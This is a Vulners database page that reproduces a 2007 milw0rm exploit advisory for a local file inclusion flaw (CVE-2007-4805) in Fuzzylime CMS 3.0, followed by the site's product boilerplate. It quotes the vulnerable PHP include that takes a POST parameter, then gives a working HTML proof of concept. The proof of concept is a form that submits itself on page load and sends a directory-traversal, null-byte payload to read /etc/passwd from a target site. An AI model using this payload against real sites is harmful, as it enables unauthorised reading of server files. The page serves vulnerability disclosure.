Lucene search
+L

Fuzzylime CMS 3.0 - Local File Inclusion

🗓️ 08 Sep 2007 00:00:00Reported by not sec groupType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 26 Views

Fuzzylime CMS 3.0 Local File Inclusion Vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2007-4805
11 Sep 200718:00
cve
cvelist
Cvelist
CVE-2007-4805
11 Sep 200718:00
cvelist
euvd
EUVD
EUVD-2007-4786
7 Oct 202500:30
euvd
nvd
NVD
CVE-2007-4805
11 Sep 200718:17
nvd
prion
Prion
Directory traversal
11 Sep 200718:17
prion
prion
Prion
Directory traversal
14 Jul 200823:41
prion
prion
Prion
Directory traversal
1 Dec 200815:30
prion
########################################################################
#################
#
#                           not sec group
#        http://www.notsec.com     [email protected]
#
#
#                      [fuzzylime (cms) <= 3.0]
#
# Class:         Local File Inclusion
# Found:       08/09/2007
# Site:           http://cms.fuzzylime.co.uk/
#Download:  http://cms.fuzzylime.co.uk/files/cms.zip
#Author:      [wHITe_ShEEp] of notsec
#Contact:     [email protected] - http://www.notsec.com
#
########################################################################
#################


                   vulnerable code:
       [cms]/code/getgalldata.php
______________________________________________________

1:    <?
2:    $p = $_POST[p];
3:    $m = $_POST[img];
4:    $m = "e$m";
5:    $entrytype = "gallery";
6:    include "../gallery/$p.inc.php";
7:    include "settings.inc.php";
8:    include "../$admindir/languages/english.inc.php";
...
41:   ?>
_______________________________________________________



       Exploit: ( Work only with magic_quotes_gpc = Off )
_______________________________________________________

<html>
<body onload="document.myform.submit()">
<form name="myform" action="http://www.site.com/[fuzzylime]/code/
getgalldata.php" method="post">
<input name="p" type="text" size="30" value="../../../../../../../../
etc/passwd%00" />
</form>
</html>
________________________________________________________




       Thanks to:
________________________________________________________

All notsec.com members;
r00t for testing;
________________________________________________________

# milw0rm.com [2007-09-08]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

08 Sep 2007 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.07383
26